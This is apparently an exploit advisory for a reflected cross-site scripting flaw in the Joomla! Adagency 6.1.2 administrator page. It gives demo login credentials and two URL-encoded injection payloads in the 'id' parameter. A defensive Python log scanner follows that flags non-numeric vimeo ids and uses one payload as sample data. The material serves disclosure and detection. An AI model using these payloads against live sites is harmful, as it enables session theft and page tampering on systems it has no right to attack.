## https://sploitus.com/exploit?id=PACKETSTORM:158934
# Exploit Title: Joomla! Adagency V 6.1.2 Cross Site Scripting  
# Date: 24.07.2020  
# Author: Vincent666 ibn Winnie  
# Software Link: https://adagency.ijoomla.com/  
# Tested on: Windows 10  
# Web Browser: Mozilla Firefox  
# Blog : https://pentest-vincent.blogspot.com/  
# PoC: https://pentest-vincent.blogspot.com/2020/08/joomla-adagency-v-612-cross-site.html  
  
PoC:  
  
https://ijoomlademo.com  
  
user demo  
  
password demo  
  
Example with XSS code injection through the `id` parameter:  
  
https://ijoomlademo.com/administrator/index.php?option=com_adagency&controller=adagencyAbout&task=vimeo&id=%22%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E  
  
Example with XSS and HTML code injection:  
  
https://ijoomlademo.com/administrator/index.php?option=com_adagency&controller=adagencyAbout&task=vimeo&id=%22%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cbody%20background=%22https://i.gifer.com/IrM.gif%22%3E%3Cscript%3Ealert(%22Cross%20site%20scripting%20and%20html%20code%20injection%22)%3C/script%3E%3Ciframe%20width=%22540%22%20height=%22450%22%20src=%22http://www.youtube.com/embed/s5_XkjC2fGY%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E  
  
Video PoC:  
  
https://www.youtube.com/watch?v=APDqKv88znw  
  
Picture:  
  
https://imgur.com/a/w2attqc  
  
XSS code on the pastebin:  
  
https://pastebin.com/bRSnjZtL
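
A defender-side check for the requests shown above, as an added example that is not part of the original advisory: it scans access-log lines for `com_adagency` requests with `task=vimeo` whose `id` value is not purely numeric. The digits-only rule for Vimeo ids, the combined log format, and the sample log lines (constructed) are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request target inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate Vimeo video id is digits only.
NUMERIC_ID = re.compile(r"\d+")

BASE = "/administrator/index.php?option=com_adagency&controller=adagencyAbout&task=vimeo&id="
# Constructed sample log lines; line 2 carries the first payload from the advisory.
SAMPLE_LOG = [
    f'203.0.113.5 - - [24/Jul/2020:10:00:00 +0000] "GET {BASE}123456789 HTTP/1.1" 200 512',
    f'203.0.113.9 - - [24/Jul/2020:10:01:00 +0000] "GET {BASE}%22%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 733',
    f'203.0.113.9 - - [24/Jul/2020:10:02:00 +0000] "GET {BASE}%253Cb%253E HTTP/1.1" 200 733',
    '203.0.113.7 - - [24/Jul/2020:10:03:00 +0000] "GET /index.php?option=com_content&id=%3Cb%3E HTTP/1.1" 200 90',
]


def suspicious_vimeo_id(target):
    """Return the decoded id when a vimeo-task request has a non-numeric id, else None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if query.get("option", [""])[-1].lower() != "com_adagency":
        return None
    if query.get("task", [""])[-1].lower() != "vimeo":
        return None
    for value in query.get("id", []):
        # parse_qs decoded once; decode again to catch double encoding (%253C).
        decoded = unquote(value)
        if not NUMERIC_ID.fullmatch(decoded):
            return decoded
    return None


def scan(lines):
    """Yield (line_number, decoded_id) for every flagged log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            bad = suspicious_vimeo_id(match.group(1))
            if bad is not None:
                yield number, bad


if __name__ == "__main__":
    for number, bad in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric vimeo id {bad!r}")
```

The same digits-only test is the natural server-side validation for this parameter before it is written into the iframe markup, together with HTML-escaping the value on output.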